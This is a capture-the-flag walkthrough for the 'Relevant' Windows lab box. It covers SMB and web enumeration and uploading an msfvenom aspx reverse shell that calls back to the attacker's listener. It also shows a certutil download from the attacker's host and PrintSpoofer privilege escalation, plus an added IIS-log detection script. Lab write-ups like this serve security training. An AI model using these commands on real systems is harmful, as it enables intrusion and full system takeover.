Relevant

Nmap Scan

$ nmap -A -T4 -p- 10.10.233.103

I'll open up my browser to see what's running on the webserver.

Default Webpage for IIS

Just a default webpage. Looking at the webpage doesn't reveal anything either. Let's use gobuster to search for hidden directories.

We find that there is a hidden directory at /nt4wrksv. Let's open it up.

Just a blank page

We find a blank page only. Viewing the source code doesn't reveal anything helpful either.

Since we have smb, I will use the smbclient tool to enumerate port 139.

We have a share named nt4wrksv, the same name as the hidden directory we found on the web server. Hmm... interesting. Let's see what's in it.

We get a passwords.txt file. That's interesting. Let's view its contents.

We get some encoded user passwords. They seem to be in base64. Let's try decoding them.

Success, we retrieve some credentials.

(Disclaimer: the creator of the room, in his walkthrough video https://youtu.be/VfadeHqnuZc?t=260, says he put those credentials there to confuse people. The point of the challenge is to discourage the "Try Harder" mentality; people should try something else.) As we can see from the screenshot below, we will not be able to log in with evil-winrm (or psexec, or smb) using the credentials we found, so we need to enumerate further.

Since the name of the share matches the directory we found on the website, let's see if we can navigate to it in the web browser and access the passwords.txt file.

Success

NB: There was a second website on port 49663 that did not appear in my initial nmap scan results. That is the site from which I can access the passwords file.

After a quick test, I found out that we have upload rights on the smb share, and that we can access whatever we upload via the website. This gives me an idea for a reverse shell.

Uploading a test file I created
Accessing the test file

I'll use msfvenom to generate an aspx payload, which we can then upload to smb.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.17.44 LPORT=4444 -f aspx -o rev.aspx
Generating Payload
Uploading payload to smb share

Now let's set up our listener.

nc -nvlp 4444

And let's execute our payload by navigating to the rev.aspx file on our browser.

Executing payload
Success

Success! We got our initial foothold.
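From the defender's side, the chain above (a writable SMB share that doubles as an IIS directory, followed by a browser request for the uploaded .aspx file) leaves a trace in the IIS W3C access log. The script below is an added example, not part of this write-up: it assumes the default IIS log field set and that /nt4wrksv/ is the share-backed path, and the log lines it parses are constructed to mirror the steps above.

```python
"""Flag requests that execute server-side script from a web directory
that is also exposed as a writable SMB share (assumption: /nt4wrksv/).
Constructed sample log in IIS W3C format; not a real capture."""
from typing import Dict, List

# Directories served by IIS that are also writable over SMB (assumption).
SHARE_BACKED_PATHS = ("/nt4wrksv/",)
# Extensions IIS hands to a script engine; a fresh file here runs as code.
SCRIPT_EXTS = (".aspx", ".asp", ".ashx", ".asmx", ".svc", ".cshtml")

# Constructed sample log (default IIS field set). Field names come from #Fields.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-01-01 10:00:01 10.10.233.103 GET /nt4wrksv/passwords.txt - 49663 - 10.9.17.44 Mozilla/5.0 - 200 0 0 12
2024-01-01 10:00:05 10.10.233.103 GET /nt4wrksv/test.txt - 49663 - 10.9.17.44 Mozilla/5.0 - 200 0 0 3
2024-01-01 10:00:09 10.10.233.103 GET /nt4wrksv/rev.aspx - 49663 - 10.9.17.44 Mozilla/5.0 - 200 0 0 1480
2024-01-01 10:00:20 10.10.233.103 GET /iisstart.htm - 80 - 10.9.17.44 Mozilla/5.0 - 200 0 0 2
"""


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Parse W3C extended log lines, using the #Fields directive for names."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # field names follow the directive
        elif line and not line.startswith("#"):
            parts = line.split()
            if fields and len(parts) == len(fields):
                rows.append(dict(zip(fields, parts)))
    return rows


def find_script_execution(rows: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return rows where a script file under a share-backed path was requested."""
    hits = []
    for row in rows:
        stem = row.get("cs-uri-stem", "").lower()
        if stem.startswith(SHARE_BACKED_PATHS) and stem.endswith(SCRIPT_EXTS):
            hits.append(row)
    return hits


if __name__ == "__main__":
    for hit in find_script_execution(parse_w3c(SAMPLE_LOG)):
        print(f"{hit['date']} {hit['time']} {hit['c-ip']} -> {hit['cs-uri-stem']} "
              f"(status {hit['sc-status']}, port {hit['s-port']})")
```

Pairing the hit with the SMB write that created the file (Windows event 5145 on the share, if object access auditing is enabled) ties the web request back to the upload.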

We are now going to exploit the PrintSpoofer vulnerability. You can read more about it on the link below, and download it on your machine. It allowed service accounts to occasionally access the SYSTEM user on Windows Server 2016, Server 2019, and Windows 10.

The exploit works by abusing SeImpersonatePrivilege. When you see this privilege, you may consider a potato attack or incognito. (However, neither attack works on this box: for incognito we don't have a token, and for the potato attack DCOM has been disabled.)

Let's open up a python server on our machine.

Now let's navigate to the website's root directory.

Viewing our files

At this point, we will perform a file transfer. We want a copy of the PrintSpoofer exploit on this Windows machine.

certutil -urlcache -f http://10.9.17.44/PrintSpoofer.exe printspoofer.exe

Hmm, an error occurred.

Let's try another way to transfer the file.

We will just use smb to upload the PrintSpoofer.exe file.

Success

And it's right where we want it :)

Let's execute our exploit.

PrintSpoofer.exe -i -c cmd

The -i flag makes the spawned process interactive in the current prompt, and the -c flag specifies the command to execute.

Boom!!!!

Now let's go retrieve our flags.

User flag retrieved
Admin flag retrieved

And we are done! :D
